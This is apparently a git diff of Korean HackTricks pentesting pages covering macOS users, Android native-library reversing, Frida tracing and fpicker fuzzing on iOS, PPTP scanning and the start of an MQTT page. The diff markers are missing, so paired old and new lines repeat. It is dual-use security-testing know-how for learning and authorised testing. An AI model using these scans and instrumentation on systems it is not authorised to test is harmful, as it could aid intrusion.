* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
@ -30,7 +30,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈
### 일반 사용자
* **데몬**: 시스템 데몬을 위해 예약된 사용자입니다. 기본 데몬 계정 이름은 일반적으로 "\_"로 시작합니다:
* **데몬**: 시스템 데몬을 위해 예약된 사용자입니다. 기본 데몬 계정 이름은 일반적으로 "\_"로 시작합니다:
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
@ -50,6 +50,6 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
### 사용자 권한
* **표준 사용자**: 가장 기본적인 사용자입니다. 이 사용자는 소프트웨어를 설치하거나 다른 고급 작업을 수행할 때 관리자 사용자로부터 권한을 부여받아야 합니다. 스스로 할 수는 없습니다.
* **관리자 사용자**: 대부분의 시간을 표준 사용자로서 작동하지만 소프트웨어를 설치하고 다른 관리 작업을 수행하는 등 root 작업을 수행할 수 있는 사용자입니다. 관리자 그룹에 속한 모든 사용자는 **sudoers 파일을 통해 root에 액세스**할 수 있습니다.
* **Root**: Root는 거의 모든 작업을 수행할 수 있는 사용자입니다 (시스템 무결성 보호와 같은 제한 사항이 있습니다).
* 예를 들어 root는 `/System`에 파일을 넣을 수 없습니다.
* **관리자 사용자**: 대부분의 시간을 표준 사용자로서 작동하지만 소프트웨어를 설치하고 다른 관리 작업을 수행할 수 있는 루트 작업을 수행할 수 있는 사용자입니다. 관리자 그룹에 속한 모든 사용자는 **sudoers 파일을 통해 루트에 액세스**할 수 있습니다.
* **루트**: 루트는 거의 모든 작업을 수행할 수 있는 사용자입니다 (시스템 무결성 보호와 같은 제한 사항이 있습니다).
* 예를 들어 루트는 `/System` 내부에 파일을 넣을 수 없습니다.

View file

@ -2,33 +2,33 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)로부터 AWS 해킹을 제로부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**로 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식의 HackTricks를 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고**되길 원하거나 **PDF 형식의 HackTricks를 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소로 **PR 제출**하여 해킹 트릭을 공유하세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **Discord 그룹**에 가입하세요 💬(https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦에서 **팔로우**하세요 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **HackTricks****HackTricks Cloud** 깃허브 저장소로 PR 제출하여 해킹 트릭을 공유하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로** 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
---
**추가 정보는 여기를 확인하세요: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
**더 많은 정보는 확인하세요: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
안드로이드 앱은 성능에 중점을 둔 작업을 위해 일반적으로 C 또는 C++로 작성된 네이티브 라이브러리를 사용할 수 있습니다. 악성코드 제작자들도 이러한 라이브러리를 사용하며, DEX 바이트 코드보다 역공학이 어려운 특성을 가지고 있습니다. 이 섹션은 안드로이드에 특화된 역공학 기술을 강조하며 어셈블리 언어를 가르치는 것보다 중요합니다. 호환성을 위해 ARM 및 x86 버전의 라이브러리가 제공됩니다.
@ -36,7 +36,7 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한
- **안드로이드 앱의 네이티브 라이브러리:**
- 성능 집중적인 작업에 사용됨.
- C 또는 C++로 작성되어 역공학이 어려움.
- `.so` (공유 객체) 형식으로 발견되며, Linux 이진 파일과 유사함.
- Linux 이진 파일과 유사한 `.so` (공유 객체) 형식으로 발견됨.
- 악성코드 제작자들은 분석을 어렵게 하기 위해 네이티브 코드를 선호함.
- **Java Native Interface (JNI) 및 Android NDK:**
@ -49,24 +49,24 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한
- 라이브러리 로딩 시 `JNI_OnLoad`가 실행됨.
- 자바로 선언된 네이티브 메서드는 네이티브 함수에 링크되어 실행됨.
- **자바 메서드를 네이티브 함수에 링크:**
- **자바 메서드를 네이티브 함수에 링크하는 방법:**
- **동적 링킹:** 네이티브 라이브러리의 함수 이름이 특정 패턴과 일치하여 자동 링킹됨.
- **정적 링킹:** 링킹을 위해 `RegisterNatives`를 사용하며, 함수 이름과 구조에 대한 유연성을 제공함.
- **정적 링킹:** 링킹을 위해 `RegisterNatives`를 사용하여 함수 이름과 구조에 유연성을 제공함.
- **역공학 도구 및 기술:**
- Ghidra 및 IDA Pro와 같은 도구 네이티브 라이브러리를 분석하는 데 도움을 줌.
- Ghidra 및 IDA Pro와 같은 도구 네이티브 라이브러리를 분석하는 데 도움을 줌.
- `JNIEnv`은 JNI 함수 및 상호 작용을 이해하는 데 중요함.
- 라이브러리 로딩, 메서드 링킹, 네이티브 함수 식별을 연습할 수 있는 예제가 제공됨.
- 라이브러리 로딩, 메서드 링킹 네이티브 함수 식별을 연습할 수 있는 예제가 제공됨.
### 자료:
- **ARM 어셈블리 언어 학습:**
- **ARM 어셈블리 학습:**
- 기본 아키텍처에 대한 깊은 이해를 위해 권장됨.
- Azeria Labs의 [ARM 어셈블리 기초](https://azeria-labs.com/writing-arm-assembly-part-1/)를 추천함.
- **JNI 및 NDK 문서:**
- [오라클 JNI 사양](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [오라클 JNI 명세](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [안드로이드 JNI 팁](https://developer.android.com/training/articles/perf-jni)
- [NDK 시작하기](https://developer.android.com/ndk/guides/)
- **네이티브 라이브러리 디버깅:**
- [JEB 디컴파일러를 사용한 Android 네이티브 라이브러리 디버깅](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
- [JEB 디컴파일러를 사용한 안드로이드 네이티브 라이브러리 디버깅](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)

View file

@ -2,27 +2,27 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>에서 <strong>AWS 해킹을 처음부터 전문가까지 배우세요</strong>!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>에서 <strong>제로부터 영웅까지 AWS 해킹 배우기</strong>!</summary>
다른 HackTricks 지원 방법:
HackTricks 지원하는 다른 방법:
- **회사 광고를 원하거나 HackTricks를 PDF로 다운로드하고 싶다면** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
- **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식으로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** 트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 팔로우하세요.
* **해킹 요령을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 무료로 사용해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -38,9 +38,9 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
4. 새로 추가된 Frida 소스로 이동합니다.
5. Frida 패키지를 설치합니다.
**Corellium**을 사용하는 경우 [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)에서 Frida 릴리스를 다운로드해야 합니다 (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) 그리고 Frida가 요청하는 dylib 위치 압축을 풀고 복사해야 합니다. 예: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
**Corellium**을 사용하는 경우 [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)에서 Frida 릴리스를 다운로드해야 합니다 (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) 그리고 Frida가 요청하는 dylib 위치 압축을 풀고 복사해야 합니다. 예: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
설치 후, PC에서 **`frida-ls-devices`** 명령을 사용하여 장치가 나타나는지 확인할 수 있습니다 (PC가 액세스할 수 있어야 함).\
설치 후 PC에서 **`frida-ls-devices`** 명령을 사용하여 장치가 나타나는지 확인할 수 있습니다 (PC가 액세스할 수 있어야 함).\
또한 **`frida-ps -Uia`**를 실행하여 폰의 실행 중인 프로세스를 확인할 수 있습니다.
## Jailbroken 장치 없이 Frida 및 앱 패치 없이
@ -49,17 +49,17 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
## Frida 클라이언트 설치
**frida 도구를 설치하세요**:
**frida 도구**를 설치하세요:
```bash
pip install frida-tools
pip install frida
```
Frida 서버가 설치되어 있고 장치가 실행되고 연결된 상태에서 **client**가 **작동**하는지 **확인**하세요:
Frida 서버가 설치되어 있고 장치가 실행되고 연결된 상태인 경우, **작동 여부를** **확인**하세요:
```bash
frida-ls-devices # List devices
frida-ps -Uia # Get running processes
```
## Frida 추적
## 프리다 추적
```bash
# Functions
## Trace all functions with the word "log" in their name
@ -83,7 +83,7 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
* 모든 사용 가능한 클래스 가져오기 (문자열로 필터링)
* 사용 가능한 **모든 클래스** 가져오기 (문자열로 필터링)
{% code title="/tmp/script.js" %}
```javascript
@ -105,9 +105,7 @@ console.log("Objective-C runtime is not available.");
```
{% endcode %}
* **클래스**의 **모든 메소드** 가져오기 (문자열로 필터링)
{% code title="/tmp/script.js" %}
* **클래스**의 **모든 메소드** 가져오기 (문자열로 필터링)
```javascript
// frida -U <program> -l /tmp/script.js
@ -167,7 +165,7 @@ console.log("loaded");
### Frida Stalker
[문서에서](https://frida.re/docs/stalker/): Stalker는 Frida의 코드 **추적 엔진**입니다. 이를 사용하여 스레드를 **추적**하고, 실행되는 모든 함수, 모든 블록, 심지어 모든 명령을 **캡처**할 수 있습니다.
[문서에서](https://frida.re/docs/stalker/): Stalker는 Frida의 코드 **추적 엔진**입니다. 이를 사용하여 스레드를 **추적**하 실행되는 모든 함수, 모든 블록, 심지어 모든 명령을 **캡처**할 수 있습니다.
Frida Stalker를 구현한 예제는 다음에서 확인할 수 있습니다: [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
@ -205,12 +203,12 @@ Stalker.flush(); // this is important to get all events
});
```
{% hint style="danger" %}
디버깅 목적으로는 흥미로울 수 있지만, 퍼징을 위해 계속해서 **`.follow()`** 및 **`.unfollow()`**를 해야 한다는 것은 매우 비효율적입니다.
디버깅 목적으로는 흥미로울 수 있지만, 퍼징을 위해서는 계속해서 **`.follow()`** 및 **`.unfollow()`**를 는 것은 매우 비효율적입니다.
{% endhint %}
## [Fpicker](https://github.com/ttdennis/fpicker)
[**fpicker**](https://github.com/ttdennis/fpicker)은 다양한 퍼징 모드를 제공하는 **Frida 기반의 퍼징 스위트**로, AFL++ 모드나 패시브 추적 모드와 같은 프로세스 내 퍼징을 위한 모드를 제공합니다. Frida에서 지원되는 모든 플랫폼에서 실행할 수 있어야 합니다.
[**fpicker**](https://github.com/ttdennis/fpicker)은 프로세스 내 퍼징을 위한 다양한 퍼징 모드인 AFL++ 모드나 패시브 추적 모드와 같은 옵션을 제공하는 **Frida 기반의 퍼징 스위트**입니다. Frida에서 지원되는 모든 플랫폼에서 실행할 수 있어야 합니다.
* [**fpicker 설치**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
```bash
@ -323,18 +321,18 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
{% endcode %}
{% hint style="danger" %}
이 경우에는 **앱을 다시 시작하거나 상태를 복원하지 않습니다**. 따라서, Frida가 **충돌을 발견하면**, 해당 페이로드 이후의 **다음 입력**도 앱이 **불안정한 상태**에 있기 때문에 **앱이 충돌할 수 있습니다** (입력이 앱을 충돌시키지 않아야 할 수도 있음).
이 경우에는 **앱을 다시 시작하거나 상태를 복원하지 않습니다**. 따라서, Frida가 **충돌을 발견하면**, 해당 페이로드 이후의 **다음 입력**도 앱을 **충돌시킬 수 있습니다**(앱이 불안정한 상태이기 때문에) 심지어 **입력이 앱을 충돌시키지 않아야 하는 경우에도**.
게다가, Frida는 iOS의 예외 신호에 후크를 걸기 때문에 **Frida가 충돌을 발견하면**, 아마도 **iOS 충돌 보고서가 생성되지 않을 것**입니다.
게다가, Frida는 iOS의 예외 신호에 후크될 것이므로, **Frida가 충돌을 발견하면**, 아마도 **iOS 충돌 보고서가 생성되지 않을 것**입니다.
이를 방지하기 위해, 예를 들어, 우리는 각 Frida 충돌 후에 앱을 다시 시작할 수 있습니다.
{% endhint %}
### 로그 및 충돌
**macOS 콘솔**이나 **`log`** cli를 사용하여 macOS 로그를 확인할 수 있습니다.\
**macOS 콘솔** 또는 **`log`** cli를 사용하여 macOS 로그를 확인할 수 있습니다.\
**`idevicesyslog`**를 사용하여 iOS의 로그도 확인할 수 있습니다.\
일부 로그는 **`<private>`**를 추가하여 정보를 생략니다. 모든 정보를 표시하려면 [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)에서 일부 프로필을 설치하여 해당 개인 정보를 활성화해야 합니다.
일부 로그는 **`<private>`**를 추가하여 정보를 생략할 수 있습니다. 모든 정보를 표시하려면 [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)에서 일부 프로필을 설치하여 해당 개인 정보를 활성화해야 합니다.
무엇을 해야 할지 모르겠다면:
```sh
@ -351,14 +349,14 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist
killall -9 logd
```
* **iOS**
* 설정 → 개인 정보 보호 → 분석 및 개선 → 분석 데이터
* 설정 → 개인정보 보호 → 분석 및 개선 → 분석 데이터
* `/private/var/mobile/Library/Logs/CrashReporter/`
* **macOS**:
* `/Library/Logs/DiagnosticReports/`
* `~/Library/Logs/DiagnosticReports`
{% hint style="warning" %}
iOS는 동일한 앱의 충돌을 25개까지만 저장하므로 정리해야 합니다. 그렇지 않으면 iOS가 충돌을 생성하지 않게 됩니다.
iOS는 동일한 앱의 충돌을 25개까지만 저장하므로 정리해야 합니다. 그렇지 않으면 iOS가 충돌을 생성하지 않니다.
{% endhint %}
## Frida Android 튜토리얼
@ -372,15 +370,15 @@ iOS는 동일한 앱의 충돌을 25개까지만 저장하므로 정리해야
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)**다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)**다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시도해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -391,10 +389,10 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 구입하세요
* **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>

View file

@ -6,23 +6,23 @@
HackTricks를 지원하는 다른 방법:
- **회사가 HackTricks에 광고**되길 원하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- **회사를 HackTricks에서 광고**하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
- **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
- **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -30,7 +30,7 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
## 기본 정보
**Point-to-Point Tunneling Protocol (PPTP)**은 **모바일 기기에 원격 액세스**를 위해 널리 사용되는 방법입니다. **TCP 포트 1723**을 사용하여 키 교환을 하며, **IP 프로토콜 47** (일반 라우팅 캡슐화 또는 **GRE**)를 사용하여 피어 간에 전송되는 데이터를 암호화합니다. 이 설정은 인터넷을 통해 안전한 통신 채널을 확립하는 데 중요하며, 교환되는 데이터가 무단 액세스로부터 기밀 유지되고 보호되도록 합니다.
**Point-to-Point Tunneling Protocol (PPTP)**은 **모바일 기기에 대한 원격 액세스**에 널리 사용되는 방법입니다. **TCP 포트 1723**을 사용하여 키 교환을 하며, **IP 프로토콜 47** (일반 라우팅 캡슐화 또는 **GRE**)를 사용하여 피어 간에 전송되는 데이터를 암호화합니다. 이 설정은 인터넷을 통해 안전한 통신 채널을 설정하는 데 중요하며, 교환된 데이터가 무단 액세스로부터 기밀 유지되고 보호되도록 합니다.
**기본 포트**: 1723
@ -38,7 +38,7 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
```bash
nmap Pn -sSV -p1723 <IP>
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp)
### [무차별 대입 공격](../generic-methodologies-and-resources/brute-force.md#pptp)
## 취약점
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
@ -50,10 +50,10 @@ nmap Pn -sSV -p1723 <IP>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks를 광고하거나 PDF로 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식의 HackTricks를 다운로드하길 원한다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)이나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** 트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**팔로우하세요.**
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>

View file

@ -1,28 +1,28 @@
# 1883 - Pentesting MQTT (Mosquitto)
# 1883 - MQTT (Mosquitto) 펜테스팅
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>에서 <strong>AWS 해킹을 처음부터 전문가까지 배우세요</strong>!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**가 되는 **AWS 해킹**을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 PDF로 HackTricks를 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
- **회사를 HackTricks에서 광고**하거나 **PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
